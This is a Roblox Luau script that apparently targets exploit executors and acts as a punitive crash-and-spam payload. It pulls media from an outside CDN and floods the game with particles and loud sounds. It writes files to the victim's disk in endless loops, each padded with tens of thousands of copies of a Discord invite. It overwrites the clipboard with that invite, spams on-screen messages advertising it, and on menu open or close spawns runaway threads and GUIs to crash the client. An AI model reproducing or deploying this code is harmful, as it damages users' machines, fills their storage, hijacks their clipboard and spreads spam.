--!nolint --!nocheck local GuiService = game:GetService("GuiService") local HttpService = game:GetService("HttpService") local RunService = game:GetService("RunService") local CDN_ASSETS = "https://files.zvyz.live/Assets/" local Assets = { ["audio"] = { Normal = "rbxassetid://8389041427", Name = "__molestador.ogg", Custom = CDN_ASSETS .. "molestador.ogg" }, ["image"] = { Normal = "rbxassetid://7120897383", Name = "__molestador.png", Custom = CDN_ASSETS .. "molestador.png" } } local Functions = { ["GetAsset"] = getcustomasset or getsynasset, ["Write"] = writefile, ["Read"] = readfile, ["HttpGet"] = function(URL: string) assert(URL, "Missing URL") assert(type(URL) == "string", "URL is not a string") local Success, Result = pcall(function() return game:HttpGet(URL) end) return Success and Result or nil end, } local New = function(Class: string, Properties: { [string]: any }) local Object = Instance.new(Class) for Property, Value in pairs(Properties) do if rawequal(Property, "Parent") then continue end Object[Property] = Value end if Properties["Parent"] then Object["Parent"] = Properties["Parent"] end return Object end local GetAsset = function(String: string) if not Assets[String] then return end local Asset = Assets[String] if not Functions["GetAsset"] or not Functions["Read"] or not Functions["Write"] then return Asset.Normal end local Success, CacheFile = pcall(function() return Functions.Read(Asset.Name) end) if Success then return Functions.GetAsset(Asset.Name); end local File = Functions.HttpGet(Asset.Custom); if not File then return Asset.Normal end pcall(Functions.Write, Asset.Name, File); return Functions.GetAsset(Asset.Name); end local function CreateSound(Volume: number?, Sound: number?) local Sound: Sound = New("Sound", { Name = HttpService:GenerateGUID(false), Volume = Volume or 1, SoundId = Sound and string.format("rbxassetid://%s", tostring(Sound)) or GetAsset("audio"), Parent = workspace }) Sound:Play() Sound.Ended:Wait() end local function CreateParticle(Parent: Instance) local Particle: ParticleEmitter = New("ParticleEmitter", { Name = HttpService:GenerateGUID(false), Texture = GetAsset("image"), Parent = Parent }) while task.wait() do Particle:Emit(1) end end function FloodParticle() for _, Item in ipairs(workspace:GetDescendants()) do if not Item:IsA("BasePart") then continue end for _ = 1, 25 do task.spawn(CreateParticle, Item) end end end function FloodSound() while task.wait(.2) do task.spawn(CreateSound, 10) end end function AbsoulateFuckingCrash() local Function; local Array = {} Function = function() pcall(function() for _ = 1, 50 do task.spawn(function() for _ = 1, 25 do local ScreenGui = New("ScreenGui", { Name = HttpService:GenerateGUID(false), DisplayOrder = 69, SafeAreaCompatibility = Enum.SafeAreaCompatibility.None, ScreenInsets = Enum.ScreenInsets.None, ResetOnSpawn = false }) New("ImageLabel", { Name = HttpService:GenerateGUID(false), Image = GetAsset("image"), Size = UDim2.new(1, 0, 1, 0), ZIndex = 69, Parent = ScreenGui }) ScreenGui.Parent = gethui and gethui() or game:GetService("Players").LocalPlayer.PlayerGui task.wait() end end) task.spawn(function() if not Functions["Write"] then return end while task.wait() do Functions.Write(string.format("XETHEUS_SKID-%s-%s.txt", HttpService:GenerateGUID(false), tostring(math.random(1, 9000000))), tostring(string.rep("https://discord.gg/pQjaYj9KrK\n", 70656))) end end) task.spawn(function() table.insert(Array, string.rep(tostring(math.random()), 6969)) end) for _ = 1, 10 do task.spawn(Function) end end end) end task.spawn(Function) end if not Functions["GetAsset"] then CreateSound(5, 6516550176) end task.spawn(function() if not Functions["Write"] then return end while true do Functions.Write(string.format("XETHEUS_SKID-%s-%s.txt", HttpService:GenerateGUID(false), tostring(math.random(1, 9000000))), tostring(string.rep("https://discord.gg/pQjaYj9KrK\n", 70656))) task.wait() end end) task.spawn(function() while true do New("Message", { Name = HttpService:GenerateGUID(false), Text = "CODIGO COMPLETO + VERSÃO PREMIUM DE GRAÇA:\nhttps://discord.gg/pQjaYj9KrK\n\n\nSOURCE CODE + PREMIUM FREE:\nhttps://discord.gg/pQjaYj9KrK\n\nO INVITE DO DISCORD FOI COPIADO!\nTHE DISCORD INVITE HAS BEEN COPIED!", Parent = workspace }) pcall(setclipboard, "https://discord.gg/pQjaYj9KrK") task.wait(.2) end end) for _, Thread in { FloodSound, FloodParticle } do task.spawn(Thread) end local function TheFuckingRealCrash() local Part: BasePart = New("Part", { Name = HttpService:GenerateGUID(false), CanCollide = false, Anchored = true }) for _, Enum in ipairs(Enum.NormalId:GetEnumItems()) do New("Decal", { Name = HttpService:GenerateGUID(false), Face = Enum, Texture = GetAsset("Image"), Parent = Part }) end local function MoveCamera() RunService.RenderStepped:Connect(function() task.spawn(function() for _ = 0, 999 do local PartClone = Part:Clone() PartClone.Parent = workspace.CurrentCamera PartClone.CFrame = workspace.CurrentCamera.CFrame * CFrame.new(0, 0, -6) * CFrame.Angles(0, math.rad(180), 0) RunService.Heartbeat:Wait() end end) end) end task.spawn(function() RunService.RenderStepped:Connect(function() New("Message", { Name = HttpService:GenerateGUID(false), Text = "CODIGO COMPLETO + VERSÃO PREMIUM DE GRAÇA:\nhttps://discord.gg/pQjaYj9KrK\n\n\nSOURCE CODE + PREMIUM FREE:\nhttps://discord.gg/pQjaYj9KrK\n\nO INVITE DO DISCORD FOI COPIADO!\nTHE DISCORD INVITE HAS BEEN COPIED!", Parent = workspace }) RunService.Heartbeat:Wait() end) end) Part.Parent = workspace.CurrentCamera task.spawn(MoveCamera) task.spawn(AbsoulateFuckingCrash) end GuiService.MenuOpened:Connect(TheFuckingRealCrash) GuiService.MenuClosed:Connect(TheFuckingRealCrash)